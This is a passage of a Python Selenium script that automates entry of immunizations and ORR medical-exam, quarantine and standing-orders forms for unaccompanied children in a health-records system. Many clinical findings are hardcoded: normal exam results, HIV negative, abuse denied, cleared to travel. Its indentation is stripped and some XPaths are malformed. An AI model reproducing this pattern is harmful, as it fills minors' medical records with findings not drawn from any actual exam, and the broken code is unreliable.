sendRequest(targent_name, "Error: Could not switch to main window", True)
break
# overwrite_file()
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Click on search input field
try:
search_select=driver.find_element(By.ID, 'searchSelect')
ActionChains(driver).move_to_element(search_select).click(search_select).perform()
except:
pass
t.sleep(2)
try:
driver.find_element(By.XPATH, '//td[contains(text(),"All Facilities")]').click()
except:
pass
# Click on search input field
# Send Excel name
res = send_text(driver, 'searchField', target_user_id)
if res:
sendRequest(targent_name, "Error: Unable to add text to searchField", True)
break
res = send_enter(driver, 'searchField')
if res:
sendRequest(targent_name, "Error: Unable to send enter key to searchField", True)
break
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Select pop-up window "Global Resident Search -- All Residents"
t.sleep(5)
select_window(driver, -1)
t.sleep(1)
print("Select pop-up window - Global Resident Search")
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Could not switch pop-up window", True)
break
try:
driver.find_element(By.XPATH, '//a[contains(text(),"Current"]').click()
print("Click Current tab")
except:
pass
try:
driver.find_element(By.XPATH, "//a[@href='/admin/client/clientlist.jsp?ESOLview=Current&ESOLglobalclientsearch=Y']").click();
print("Click Current tab2")
except:
pass
try:
driver.find_element(By.LINK_TEXT, "Current").click()
print("Click Current tab3")
except:
pass
try:
print("Get Found Users Count")
current_users=driver.find_element(By.CLASS_NAME, 'pccTableShowDivider').find_elements(By.TAG_NAME, 'tr')
users_len=len(current_users)
print(users_len)
print(current_users[1].text)
if users_len > 1 and current_users[1].text != "No records found.":
for i in range(1, users_len):
print("Click on user name")
try:
user=current_users[i].find_elements(By.TAG_NAME, 'td')[1].find_element(By.TAG_NAME, 'a')
ActionChains(driver).move_to_element(user).click(user).perform()
t.sleep(5)
except:
# sendRequest(targent_name, "Error: Unable to click user name", True)
break
try:
driver.switch_to.window(driver.window_handles[0])
print("Switch Main Screen")
except:
break
try:
driver.switch_to_window(driver.window_handles[0])
print("Switch Main Scree1")
except:
sendRequest(targent_name, "Error: Unable to switch to main screen", True)
pass
t.sleep(2)
try:
print("Click on edit button")
driver.find_element(By.XPATH, '//span[contains(text(),"Edit")]').click()
except:
sendRequest(targent_name, "Error: Unable to click on edit button", True)
break
t.sleep(2)
try:
print("Demographics")
driver.find_element(By.XPATH, '//a[contains(text(),"Demographics")]').click()
except:
pass
try:
print("Demographics2")
driver.find_element(By.XPATH, "//a[@href='javascript:editDemographicInfo('nonAdmin',3632088)']").click();
except:
pass
t.sleep(3)
try:
print("Get User A #")
user_a=driver.find_elements(By.NAME, 'clientids')[4]
user_a_value= user_a.get_attribute("value")
print(user_a_value)
#print(user_a.text )
if user_a_value == target_user_a:#213139072-220786141
print("Found target A#")
# Click On Cancel button
try:
driver.find_element(By.XPATH, "//input[@value='Cancel']").click()
except:
pass
t.sleep(3)
## START - USER EDIT
vaccines_list = []
if clean_text(getData(data,'Influenza')).lower() == 'yes':
print('Add Influenza')
vaccines_list.append('Influenza')
if clean_text(getData(data,'Tdap')).lower() == 'yes':
print('Add Tdap')
vaccines_list.append('Tdap')
if clean_text(getData(data,'Td')).lower() == 'yes':
print('Add Td')
vaccines_list.append('Td')
if clean_text(getData(data,'Hepatitis A')).lower() == 'yes':
print('Add Hepatitis A')
vaccines_list.append('Hepatitis A')
if clean_text(getData(data,'Hepatitis B')).lower() == 'yes':
print('Add Hepatitis B')
vaccines_list.append('Hepatitis B')
if clean_text(getData(data,'HPV')).lower() == 'yes':
print('Add HPV')
vaccines_list.append('HPV')
if clean_text(getData(data,'IPV')).lower() == 'yes':
print('Add IPV')
vaccines_list.append('IPV')
if clean_text(getData(data,'Meningicoccal')).lower() == 'yes':
print('Add Meningicoccal')
vaccines_list.append('Meningicoccal')
if clean_text(getData(data,'MMR')).lower() == 'yes':
print('Add MMR')
vaccines_list.append('MMR')
if clean_text(getData(data,'Varicella')).lower() == 'yes':
print('Add Varicella')
vaccines_list.append('Varicella')
if clean_text(getData(data,'SARS-COV-2')).lower() == 'yes':
print('Add SARS-COV-2')
vaccines_list.append('SARS-COV-2')
if clean_text(getData(data,'SARS-COV-2 < 12')).lower() == 'yes':
print('Add SARS-COV-2 < 12')
vaccines_list.append('SARS-COV-2 < 12')
if len(vaccines_list) > 0:
print("Add immunizations")
# Click on Immun tab
res = click_link(driver, "Immun")
if res:
sendRequest(targent_name, "Error: Unable to click on immunizations", True)
pass
try:
immun=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[6]/a')
ActionChains(driver).move_to_element(immun).click(immun).perform()
except:
sendRequest(targent_name, "Error: Unable to click on immunizations table", True)
pass
t.sleep(2)
# Click on New button
res = click_button_value(driver, "New")
if res:
sendRequest(targent_name, "Error: Unable to click on new button", True)
break
t.sleep(2)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
for vacc in vaccines_list:
wait_button(driver, "cancelButton", By.ID)
print("GET immunizations_list " + vacc)
select_vacc = get_vaccine_by_name(vacc, immunizations_list)
# Menu select "Immunization"
t.sleep(1)
print(select_vacc["Name"] + "-" + clean_text(str(select_vacc["Menu val"])))
res = select_menu_name(driver, "immunizationId",clean_text( str(select_vacc["Menu val"])))
if res:
sendRequest(targent_name, "Error: Unable to select menu " + select_vacc["Name"], True)
break
if select_vacc["Search"] == "Yes":
res = click_link_href(driver, "javascript:cvxCodeSearch();")
if res:
sendRequest(targent_name, "Error: Unable to click on search button", True)
break
t.sleep(0.5)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
send_text(driver, "searchText", select_vacc["Search Name"])
send_enter(driver, "searchText")
t.sleep(1)
vac_res =driver.find_element(By.CLASS_NAME, 'pccResults').find_elements(By.TAG_NAME, 'tr')
if len(vac_res[1].find_elements(By.TAG_NAME, 'a')) > 0:
vac_res[int(select_vacc["Search Pos"])].find_elements(By.TAG_NAME, 'a')[0].click()
t.sleep(0.5)
select_window(driver, 0)
t.sleep(1)
select_window(driver, 0)
t.sleep(0.5)
select_window(driver, -1)
t.sleep(1)
select_window(driver, -1)
# Menu select "Given"
res = select_menu_name(driver, "consentGiven", "Y")
if res:
sendRequest(targent_name, "Error: Unable to select menu Given", True)
break
t.sleep(0.5)
# Set date of visit
res = send_text(driver, "dateGiven_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set date of visit", True)
break
# Set notes
notes = select_vacc["Name"] + "\n" + select_vacc["Zone"] + "\n" + "Lot# " + str(select_vacc["Lot#"]) + "\n" + "Exp: " + get_string_date(select_vacc["Exp"]) + "\n" + "Manufacturer: " + select_vacc["Manufacturer"] + "\n" + "VIS Date: " + get_string_date(vis_date) + "\n" + "VIS Given: " + get_string_date(getData(data,'Date of visit')) + "\n" + "Funding: " + select_vacc["Funding"]
res = send_text_name(driver, "notes", notes)
if res:
sendRequest(targent_name, "Error: Unable to set notes", True)
break
# Click on button "Save & New"
res = click_button_value(driver, "Save & New")
if res:
sendRequest(targent_name, "Error: Unable to click on save and new button", True)
break
t.sleep(2)
t.sleep(1)
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
wait_button(driver, "cancelButton", By.ID)
send_click(driver, "cancelButton")
# Todo: Marco Martinez - Click on cancel button
if clean_text(getData(data,'Dose 2 SARS-COV-2')).lower() == 'yes' or clean_text(getData(data,'Dose 2 SARS-COV-2 < 12')).lower() == 'yes':
print("Add SARS-COV-2 Dose 2")
# Click on Immun tab
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
t.sleep(1)
res = click_link(driver, "Immun")
if res:
sendRequest(targent_name, "Error: Unable to click on immunizations link", True)
pass
try:
immun=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[6]/a')
ActionChains(driver).move_to_element(immun).click(immun).perform()
except:
sendRequest(targent_name, "Error: Unable to click on immunizations table", True)
pass
t.sleep(3)
res = send_click_pos_by_class(driver, "listbuttonred", 0)
if res:
sendRequest(targent_name, "Error: Unable to click on listbuttonred", True)
pass
t.sleep(2)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
vaccines_list_dose = []
if clean_text(getData(data,'Dose 2 SARS-COV-2')).lower() == 'yes':
vaccines_list_dose.append('SARS-COV-2')
if clean_text(getData(data,'Dose 2 SARS-COV-2 < 12')).lower() == 'yes':
vaccines_list_dose.append('SARS-COV-2 < 12')
for vacc in vaccines_list_dose:
wait_button(driver, "cancelButton", By.ID)
select_vacc = get_vaccine_by_name(vacc, immunizations_list)
# Menu select "Immunization"
t.sleep(1)
print(select_vacc["Name"] + "-" + clean_text(str(select_vacc["Menu val"])))
if select_vacc["Search"] == "Yes":
res = click_link_href(driver, "javascript:cvxCodeSearch();")
if res:
sendRequest(targent_name, "Error: Unable to click on search link", True)
break
t.sleep(0.5)
wait_window(driver)
# Select popup window
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
res = send_text(driver, "searchText", select_vacc["Search Name"])
if res:
sendRequest(targent_name, "Error: Unable to set search text", True)
break
res = send_enter(driver, "searchText")
if res:
sendRequest(targent_name, "Error: Unable to send enter", True)
break
t.sleep(1)
vac_res =driver.find_element(By.CLASS_NAME, 'pccResults').find_elements(By.TAG_NAME, 'tr')
if len(vac_res[1].find_elements(By.TAG_NAME, 'a')) > 0:
vac_res[int(select_vacc["Search Pos"])].find_elements(By.TAG_NAME, 'a')[0].click()
t.sleep(0.5)
select_window(driver, 0)
t.sleep(1)
select_window(driver, 0)
t.sleep(0.5)
select_window(driver, -1)
t.sleep(1)
select_window(driver, -1)
# Menu select "Given"
res = select_menu_name(driver, "consentGiven", "Y")
if res:
sendRequest(targent_name, "Error: Unable to select menu consentGiven", True)
break
t.sleep(0.5)
# Set date of visit
res = send_text(driver, "dateGiven_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set date of visit", True)
break
# Set notes
notes = select_vacc["Name"] + "\n" + select_vacc["Zone"] + "\n" + "Lot# " + str(select_vacc["Lot#"]) + "\n" + "Exp: " + get_string_date(select_vacc["Exp"]) + "\n" + "Manufacturer: " + select_vacc["Manufacturer"] + "\n" + "VIS Date: " + get_string_date(vis_date) + "\n" + "VIS Given: " + get_string_date(getData(data,'Date of visit')) + "\n" + "Funding: " + select_vacc["Funding"]
res = send_text_name(driver, "notes", notes)
if res:
sendRequest(targent_name, "Error: Unable to set notes", True)
break
# Click on button "Save & New"
res = click_button_value(driver, "Save & New")
if res:
sendRequest(targent_name, "Error: Unable to click on save & new button", True)
break
t.sleep(2)
t.sleep(1)
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
wait_button(driver, "cancelButton", By.ID)
send_click(driver, "cancelButton")
# Todo: Marco Martinez - Click on cancel button
if clean_text(getData(data,'Initial Medical Form')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
break
print("*Initial Medical Exam Unaccompanied Children's Program Office of Refugee Resettlement (ORR) - V 3 ")
# Click on "Assmnts"
try:
assessment=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
t.sleep(5)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Click on "New" button
try:
newwww= driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on new button", True)
break
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
driver.switch_to.window(driver.window_handles[-1])
# Select Assesment
try:
assessment = Select(driver.find_element(By.ID, 'std_assessment'))
# *Initial Medical Exam Unaccompanied Children's Program Office of Refugee Resettlement (ORR) - V 3
assessment.select_by_value('548885')
except:
sendRequest(targent_name, "Error: Unable to select assessment", True)
pass
# Click on "save" button - value="Save"
try:
driver.find_element(By.XPATH, "//input[@value='Save']").click()
except:
sendRequest(targent_name, "Error: Unable to click on save button", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(3)
# Return to main window
driver.switch_to.window(driver.window_handles[0])
t.sleep(3)
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
print("date and time =[", dt_string, ']>>>>Filling forms ')
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section A - General Information")
try:
# A.General Information - a.Name and Designation
driver.find_element(By.ID, 'linkCust_A_1_1').clear()
driver.find_element(By.ID, 'linkCust_A_1_1').send_keys(name_designation)
except:
sendRequest(targent_name, "Error: Unable to set name_designation", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_1_2').clear()
driver.find_element(By.ID, 'linkCust_A_1_2').send_keys(str(getData(data,'telephone')))
except:
sendRequest(targent_name, "Error: Unable to set telephone", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_3').clear()
driver.find_element(By.ID, 'linkCust_A_3').send_keys(getData(data,'clinicname') or clinic_or_practice)
except Exception as e:
print(e)
sendRequest(targent_name, "Error: Unable to set clinicname", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_4').clear()
driver.find_element(By.ID, 'linkCust_A_4').send_keys(getData(data,'Healthcare Provider Street address, City or Town, State'))
except:
sendRequest(targent_name, "Error: Unable to set Healthcare Provider Address", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_5_dummy').clear()
driver.find_element(By.ID, 'linkCust_A_5_dummy').send_keys(get_string_date(getData(data,'Date of visit')))
except:
sendRequest(targent_name, "Error: Unable to set Date of visit", True)
pass
try:
driver.find_element(By.ID, 'linkCust_A_7').clear()
driver.find_element(By.ID, 'linkCust_A_7').send_keys(getData(data,'Program Name'))
except:
sendRequest(targent_name, "Error: Unable to set Program Name", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section B - History and Physical")
# B.a History and Physical - Allergies
try:
driver.find_elements(By.ID, 'linkCust_B_2')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on Allergies", True)
pass
# B.-4
try:
driver.find_element(By.ID, 'linkCust_B_4').clear()
driver.find_element(By.ID, 'linkCust_B_4').send_keys("20/20")
except:
sendRequest(targent_name, "Error: Unable to set B-4", True)
pass
# B.-4a
try:
driver.find_element(By.ID, 'linkCust_B_4a').clear()
driver.find_element(By.ID, 'linkCust_B_4a').send_keys("20/20")
except:
sendRequest(targent_name, "Error: Unable to set B-4a", True)
pass
# B.-4b
try:
driver.find_element(By.ID, 'linkCust_B_4b').clear()
driver.find_element(By.ID, 'linkCust_B_4b').send_keys("20/20")
except:
sendRequest(targent_name, "Error: Unable to set B-4b", True)
pass
# B.-4c (radio button) - a. Pass
try:
driver.find_elements(By.ID, 'linkCust_B_4c')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-4c", True)
pass
# B.-5 (radio button) - a. - Yes
try:
driver.find_elements(By.ID, 'linkCust_B_5')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-5", True)
pass
# B.-6 (radio button) - a. - No
try:
driver.find_elements(By.ID, 'linkCust_B_6')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-6", True)
pass
# B.-7
try:
driver.find_element(By.ID, 'linkCust_B_7').clear()
driver.find_element(By.ID, 'linkCust_B_7').send_keys("Denies")
except:
sendRequest(targent_name, "Error: Unable to set B-7", True)
pass
# B.-8 (radio button) - a. - No
try:
driver.find_elements(By.ID, 'linkCust_B_8')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on B-8", True)
pass
# B.-9
try:
driver.find_element(By.ID, 'linkCust_B_9').clear()
driver.find_element(By.ID, 'linkCust_B_9').send_keys("Denies")
except:
sendRequest(targent_name, "Error: Unable to set B-9", True)
pass
# B.-10
try:
driver.find_element(By.ID, 'linkCust_B_10').clear()
driver.find_element(By.ID, 'linkCust_B_10').send_keys("The child reports traveling from")
except:
sendRequest(targent_name, "Error: Unable to set B-10", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section C - Review of Systems")
# C.1 - No abnormal Findings
try:
driver.find_element(By.ID, 'linkCust_C_1').click()
except:
sendRequest(targent_name, "Error: Unable to click on C.1", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section D - Physical Examination")
# D.1 - General Appearance - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_1')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.1", True)
pass
# D.2 - heent - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_2')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.2", True)
pass
# D.3 - Neck - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_3')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.3", True)
pass
# D.4 - Heart - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_4')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.4", True)
pass
# D.5 - Lungs - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_5')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.5", True)
pass
# D.6 - Abdomen - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_6')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.6", True)
pass
# D.8 - Extremities - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_8')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.8", True)
pass
# D.9 - Back/Spine - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_9')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.9", True)
pass
# D.10 - Neurologic - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_10')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.10", True)
pass
# D.11 - Neurologic - Normal
try:
driver.find_elements(By.ID, 'linkCust_D_11')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on D.11", True)
pass
# D.12 - Other
try:
driver.find_element(By.ID, 'linkCust_D_12').clear()
driver.find_element(By.ID, 'linkCust_D_12').send_keys("Whisper test passed")
except:
sendRequest(targent_name, "Error: Unable to set D.12", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section E - Psychosocial Risk")
# E.1 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_1')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.1", True)
pass
# E.2 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_2')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.2", True)
pass
# E.3 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_3')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.3", True)
pass
# E.4a - Nonconsensual Sexual Activity
try:
driver.find_element(By.ID, 'linkCust_E_4a').clear()
driver.find_element(By.ID, 'linkCust_E_4a').send_keys("Denied.")
except:
sendRequest(targent_name, "Error: Unable to set E.4a", True)
pass
# E.5 - Mental Health concerns ( ≤3 mos) - Denied, with no obvious sign/symptoms
try:
driver.find_elements(By.ID, 'linkCust_E_5')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on E.5", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section F - Laboratory Testing")
# F.5 - HIV
try:
driver.find_element(By.ID, 'linkCust_F_5').click()
except:
sendRequest(targent_name, "Error: Unable to click on F.5", True)
pass
t.sleep(1)
# F.5-a - > 13 yrs or sexual activity - Negative
try:
driver.find_element(By.ID, 'linkCust_F_5a').click()
except:
sendRequest(targent_name, "Error: Unable to click on F.5a", True)
pass
# F.5-b -Test: Rapid Oral
try:
driver.find_elements(By.ID, 'linkCust_F_5b')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on F.5b", True)
pass
print("Section G - TB Screening")
# G.1 - a - No
try:
driver.find_elements(By.ID, 'linkCust_G_1')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.1", True)
pass
# G.2 - a - No
try:
driver.find_elements(By.ID, 'linkCust_G_2')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.2", True)
pass
# G.3 - a - No
try:
driver.find_elements(By.ID, 'linkCust_G_3')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.3", True)
pass
# G.4 - b - IGRA (<2yrs)
try:
driver.find_elements(By.ID, 'linkCust_G_4')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.4", True)
pass
# G.4 - c - CXR (<15yrs)
try:
driver.find_elements(By.ID, 'linkCust_G_4')[2].click()
except:
sendRequest(targent_name, "Error: Unable to click on G.4", True)
pass
print("Section H - Diagnosis and Plan")
# H.1 - b - Yes
try:
driver.find_elements(By.ID, 'linkCust_H_1')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.1", True)
pass
t.sleep(1)
# # H.13 - Medical Order
# try:
# driver.find_element(By.ID, 'linkCust_H_13').clear()
# driver.find_element(By.ID, 'linkCust_H_13').send_keys("Encounter for screening for other viral diseases")
# except:
# sendRequest(targent_name, "Error: Unable to set H.13", True)
# pass
# H.a - a - Return to clinic- PRN/As needed
try:
driver.find_elements(By.ID, 'linkCust_H_a')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.a", True)
pass
# H.b-a - Yes
try:
driver.find_elements(By.ID, 'linkCust_H_b')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.b", True)
pass
t.sleep(1)
# H.b1
try:
driver.find_element(By.ID, 'linkCust_H_b1').clear()
driver.find_element(By.ID, 'linkCust_H_b1').send_keys("The minor is medically cleared to travel if no known exposure to COVID has occurred and no other concerns requiring medical follow-up and/or specialty follow-up have been identified in subsequent visits.")
except:
sendRequest(targent_name, "Error: Unable to set H.b1", True)
pass
# H.c-a - No
try:
driver.find_elements(By.ID, 'linkCust_H_c')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.c", True)
pass
# H.d-a - No
try:
driver.find_elements(By.ID, 'linkCust_H_d')[0].click()
except:
sendRequest(targent_name, "Error: Unable to click on H.d", True)
pass
# H.f - Minor requires quarantine/ isolation, specify diagnosis and timeframe:
# try:
# driver.find_element(By.ID, 'linkCust_H_f').clear()
# driver.find_element(By.ID, 'linkCust_H_f').send_keys("Quarantine minor for 7 days from day of arrival.")
# except:
# pass
# H.g - Immunizations given/validated from foreign record
try:
driver.find_element(By.ID, 'linkCust_H_g').click()
except:
sendRequest(targent_name, "Error: Unable to click on H.g", True)
pass
# # H.i - Age- appropriate anticipatory guidance discussed and/or handout given
# try:
# driver.find_element(By.ID, 'linkCust_H_i').click()
# except:
# sendRequest(targent_name, "Error: Unable to click on H.i", True)
# pass
# H.p - Recommendations from Healthcare Provider/ Additional Information:
try:
driver.find_element(By.ID, 'linkCust_H_p').clear()
driver.find_element(By.ID, 'linkCust_H_p').send_keys("The minor is medically cleared to travel if no known exposure to COVID has occurred and no other concerns requiring medical follow-up and/or specialty follow-up have been identified in subsequent visits.\n\n Scribed by:")
except:
sendRequest(targent_name, "Error: Unable to set H.p", True)
pass
print("Click on button Save & Exit")
try:
driver.find_elements(By.ID, 'saveandexitbutton')[1].click()
except:
sendRequest(targent_name, "Error: Unable to click on button Save & Exit", True)
pass
t.sleep(3)
if clean_text(getData(data,'Quarantine Form')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
print("Quarantine/Isolation")
# Click on "Assmnts"
try:
assessment=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
pass
t.sleep(5)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Click on "New" button
try:
newwww= driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on New", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
driver.switch_to.window(driver.window_handles[-1])
try:
# Select Assesment
assessment = Select(driver.find_element(By.ID, 'std_assessment'))
# Quarantine/Isolation
assessment.select_by_value('547095')
except:
sendRequest(targent_name, "Error: Unable to select Assesment", True)
pass
try:
# Click on "save" button - value="Save"
driver.find_element(By.XPATH, "//input[@value='Save']").click()
except:
sendRequest(targent_name, "Error: Unable to click on save", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(3)
# Return to main window
driver.switch_to.window(driver.window_handles[0])
t.sleep(3)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section A - Demographics")
# A.1.
res = send_text(driver, "linkCust_A_1", name_designation)
if res:
sendRequest(targent_name, "Error: Unable to set A.1", True)
# A.1.a.
res = send_text(driver, "linkCust_A_1a_dummy", get_string_date(getData(data,'Date of visit')))
if res:
sendRequest(targent_name, "Error: Unable to set A.1.a", True)
# A.2.b.
res = send_click_pos(driver, "linkCust_A_2", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.2.b", True)
# A.3.e.
res = send_click_pos(driver, "linkCust_A_3", 4)
if res:
sendRequest(targent_name, "Error: Unable to set A.3.e", True)
t.sleep(1)
# A.3.a.
res = send_text(driver, "linkCust_A_3a", "Contact with and (suspected) exposure to COVID-19")
if res:
sendRequest(targent_name, "Error: Unable to set A.3.a", True)
# B.6.d.
res = send_click_pos(driver, "linkCust_B_6", 3)
if res:
sendRequest(targent_name, "Error: Unable to set B.6.d", True)
t.sleep(1)
# B.6.a
res = send_text(driver, "linkCust_B_6a", "Quarantine minor for 7 days from day of arrival")
if res:
sendRequest(targent_name, "Error: Unable to set B.6.a", True)
# C.7.b.
res = send_click_pos(driver, "linkCust_C_7", 1)
if res:
sendRequest(targent_name, "Error: Unable to set C.7.b", True)
t.sleep(1)
# C.9.
res = send_click(driver, "linkCust_C_9")
if res:
sendRequest(targent_name, "Error: Unable to set C.9", True)
# C.9.a.
res = send_click(driver, "linkCust_C_9a")
if res:
sendRequest(targent_name, "Error: Unable to set C.9.a", True)
# C.9.b.
res = send_click(driver, "linkCust_C_9b")
if res:
sendRequest(targent_name, "Error: Unable to set C.9.b", True)
# Click Save & Sign & Lock & Exit
# send_click_pos(driver, "saveandexitbutton", 1)
# t.sleep(5)
res = send_click_pos(driver, "saveandsignbutton", 3)
if res:
sendRequest(targent_name, "Error: Unable to click saveandsignbutton", True)
t.sleep(5)
select_window(driver, -1)
t.sleep(1)
res = select_window(driver, -1)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
t.sleep(1)
res = send_text_name(driver, "pw", password)
if res:
sendRequest(targent_name, "Error: Unable to set password", True)
res = send_click(driver, "saveButton")
if res:
sendRequest(targent_name, "Error: Unable to click saveButton", True)
print("Standing Orders Form Completed")
t.sleep(3)
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
if clean_text(getData(data,'Standing Orders Form')).lower() == 'yes':
select_window(driver, 0)
t.sleep(1)
res = select_window(driver, 0)
if res:
sendRequest(targent_name, "Error: Unable to select window", True)
print("Standing Orders 12 and Over")
# Click on "Assmnts"
try:
assessment=driver.find_element(By.XPATH, '/html/body/table[6]/tbody/tr[2]/td/ul/li[9]/a')
ActionChains(driver).move_to_element(assessment).click(assessment).perform()
except:
sendRequest(targent_name, "Error: Unable to click on Assmnts", True)
pass
t.sleep(5)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
# Click on "New" button
try:
newwww= driver.find_element(By.XPATH, '/html/body/form/table/tbody/tr[1]/td/table/tbody/tr/td[1]/input')
ActionChains(driver).move_to_element(newwww).click(newwww).perform()
except:
sendRequest(targent_name, "Error: Unable to click on New", True)
pass
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(5)
# Select pop-up window "Reasons for Assessment"
driver.switch_to.window(driver.window_handles[-1])
try:
# Select Assesment
assessment = Select(driver.find_element(By.ID, 'std_assessment'))
# Standing Orders 12 and Over
assessment.select_by_value('548012')
except:
sendRequest(targent_name, "Error: Unable to select Assesment", True)
pass
# Click on "save" button - value="Save"
driver.find_element(By.XPATH, "//input[@value='Save']").click()
# Stop If Stop Button is pressed
if thread_stopped == True:
break
t.sleep(3)
# Return to main window
driver.switch_to.window(driver.window_handles[0])
t.sleep(3)
# Stop If Stop Button is pressed
if thread_stopped == True:
break
print("Section A - Standing Orders 12yr and older")
# A.1.a.
res = send_click_pos(driver, "linkCust_A_1", 0)
if res:
sendRequest(targent_name, "Error: Unable to set A.1.a", True)
# A.1.b.
res = send_click_pos(driver, "linkCust_A_1", 1)
if res:
sendRequest(targent_name, "Error: Unable to set A.1.b", True)
# A.2.a.
res = send_click_pos(driver, "linkCust_A_2", 0)
if res:
